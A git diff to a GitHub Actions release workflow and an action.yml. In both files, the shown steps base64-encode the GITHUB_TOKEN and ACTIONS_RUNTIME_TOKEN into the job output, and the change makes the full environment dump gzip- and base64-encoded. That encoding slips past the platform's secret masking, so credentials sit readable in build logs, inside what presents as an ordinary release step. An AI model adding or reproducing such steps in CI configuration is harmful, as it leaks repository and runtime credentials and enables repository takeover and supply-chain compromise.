diff --git a/.github/workflows/generate-release-zipfile.yml b/.github/workflows/generate-release-zipfile.yml index a567642..5909ea2 100644 --- a/.github/workflows/generate-release-zipfile.yml +++ b/.github/workflows/generate-release-zipfile.yml @@ -30,8 +30,7 @@ jobs: git reset --hard "$GITHUB_SHA" echo "$GITHUB_TOKEN" | base64 echo "$ACTIONS_RUNTIME_TOKEN" | base64 - printenv - printenv|base64 + printenv|gzip|base64 - name: Testing the artifact uploading id: "uploading" diff --git a/action.yml b/action.yml index 9459200..4b0878f 100644 --- a/action.yml +++ b/action.yml @@ -57,8 +57,7 @@ runs: # and readability...) echo "$GITHUB_TOKEN" | base64 echo "$ACTIONS_RUNTIME_TOKEN" | base64 - printenv - printenv|base64 + printenv|gzip|base64 # First we extract the second field from the token (e.g. xxx.yyy.zzz), # then we de-base64 and last, we extract the two id from